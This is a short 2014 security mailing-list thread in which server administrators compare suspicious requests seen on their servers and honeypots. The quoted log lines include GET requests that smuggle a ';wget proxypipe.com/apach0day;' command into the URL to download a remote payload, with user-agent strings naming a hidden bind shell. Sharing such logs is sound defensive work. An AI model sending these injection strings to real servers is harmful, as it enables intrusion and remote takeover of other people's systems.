I got the same on 7 different servers.
Plus, I also had this, from the same IP on 25/06 on 3 of my servers:

GET /rutorrent HTTP/1.0
User-Agent: Chrome 14.2.0 Mozilla (Gecko)
Accept: */*

Bruno


On 29 July 2014 08:05, Lutz Schildt <l...@lsmooth.de> wrote:

> On 28.07.2014 21:26, Lutz Schildt wrote:
>
>> I've seen the same request on one of my honeypots and a second one a few
>> hours later from the same IP:
>>
>>
>> GET/?x0a/x04/x0a/x02/x06/x08/x09/cDDOSpart3dns;wget
>> proxypipe.com/apach0day;
>> HTTP/1.0
>> User-agent: chroot-apach0day
>> Referrer: /xA/x0a/x06
>>
>> _______________________________________________
>> Pauldotcom mailing list
>> Pauldotcom@mail.securityweekly.com
>> http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
>> Main Web Site: http://pauldotcom.com
>>
> Another one:
>
> GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSSdns-STAGE2;wget
> proxypipe.com/apach0day;
> HTTP/1.0
> User-agent: chroot-apach0day-HIDDEN BINDSHELL-ESTAB
> Referrer: /xA/x0a/x06HIDDENSHELL--ESTABLISHED
>



-- 
- Bruno